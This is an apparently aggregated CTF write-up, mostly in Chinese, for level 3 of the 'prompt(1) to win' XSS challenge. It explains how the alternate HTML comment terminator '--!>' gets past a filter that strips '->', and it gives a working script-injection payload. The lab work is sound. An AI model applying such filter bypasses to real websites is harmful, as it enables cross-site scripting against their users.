【prompt(1) to win】 Level 3 - HTML Comment

2 years ago

source link: https://exp-blog.com/safe/ctf/prompt/level-3-html-comment/
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.

【prompt(1) to win】 Level 3

javascript

function escape(input) {
    // filter potential comment end delimiters
    input = input.replace(/->/g, '_');

    // comment the input to avoid script execution
    return '<!-- ' + input + ' -->';
}

正则把 -> 过略了，导致我们无法闭合注释。

但是 HTML 注释还有另一种闭合方式：<!-- xxxxx --!>

因此构造这样的 payload 即可实现绕过：--!><script>prompt(1)</script>

payload.html : 下载

Recommend

Git 仓库瘦身
【Root-Me】 XSS - Reflected
trojan 睁眼看世界教程
【upload-labs】 Pass 01 - File Extension
获取 Sysmon 事件信息
【Root-Me】 PHP register globals
【Root-Me】 Encoded string
PayPal也加入反俄制裁！已停止俄罗斯新用户注册！
奥克斯、浪莎等品牌加盟苏宁拼购928换季专场
【alert(1) to win】 Level 01 - Warmup

About Joyk

Aggregate valuable and interesting links.
Joyk means Joy of geeK